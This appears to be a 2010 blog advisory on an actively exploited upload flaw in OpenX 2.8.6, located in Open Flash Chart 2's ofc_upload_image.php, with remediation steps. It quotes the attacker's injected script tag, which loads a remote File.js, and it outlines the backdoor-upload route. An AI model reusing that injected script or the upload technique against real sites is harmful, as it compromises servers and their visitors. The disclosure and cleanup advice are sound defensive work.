Critical vulnerability in OpenX 2.8.6 & Open Flash Chart 2

There is a critical security flaw in OpenX 2.8.6 (and 2.8.5 and probably several earlier versions) which allows attackers to gain control of the webserver account and thus the adserver. The security hole is being actively exploited in the wild (as I learned the hard way). It seems that this hole is only known to attackers (in the OpenX context) at the moment, since I was not able to find any warning or other reference to it.

The problem lies in the following file:

/www/admin/plugins/videoReport/lib/ofc2/ofc_upload_image.php

The file ships with the video plugin. It is a component of Open Flash Chart 2 which is already known to be vulnerable. Basically, it allows an attacker to upload any file to the server including executables. This way, the attacker uploads a php backdoor and gains full access to the webserver account. From there he can (amongst other things) take control over the OpenX installation.

In our case, the attacker created a new admin user in the OpenX database called “root”. Interestingly, this user was not shown anywhere in the user accounts. But it did show up in the user log when he appended the following malicious script to one of our ad zones:

<script type="text/javascript" src="http://keyserveronline.com:8080/File.js"></script>

Interestingly, this vulnerability is also still present in the latest version of Open Flash Chart 2. It wouldn’t be hard to fix, but seemingly noone bothered to release a fix, yet. Me neither, since I do not need this component. A simple workaround is to delete ofc_upload_image.php. The core features of OpenX should not be affected since this file seems to be connected to reports of the video plugin and might even be unused (since it is part of a whole library). Alternatively, access to the file can be restricted via htaccess to trusted users.

I highly recommend to do this immediately, since this vulnerability is being actively exploited.

Also check for signs of a already installed backdoor. In our case, the attacker closed the vulnerability himself (presumably so that noone else can take control over his loot), so take a look at the file before deleting it and compare it with the one that ships with OpenX. If it has been edited, you probably have already been hacked and a backdoor is installed.

What to do once the server has been hacked (Update 11.9.2010)

If you think your server has been compromised, you need to make sure that you get rid of all backdoors that might have been hidden in your system. Finding a backdoor in a compromised OpenX is tricky at best, so better get rid of the original installation completely.

Re-install OpenX and apply the fix mentioned above. Do not keep any files of the old installation. Delete or archive everything that you did not install freshly from a trusted source.

Check your database. Take a look at the table ox_users and delete every entry that does not represent a trusted user. Check the prepend and append fields of all banners and zones. Remove suspicious code.

Change your passwords.

If you want to be absolutely sure, you would have to re-install the whole server because it might have been rooted. But if your server was configured savely and did not contain any vulnerabilities that can be exploited by local users, the chances of this are moderately low. Decide for yourself if you want to take this time consuming measure.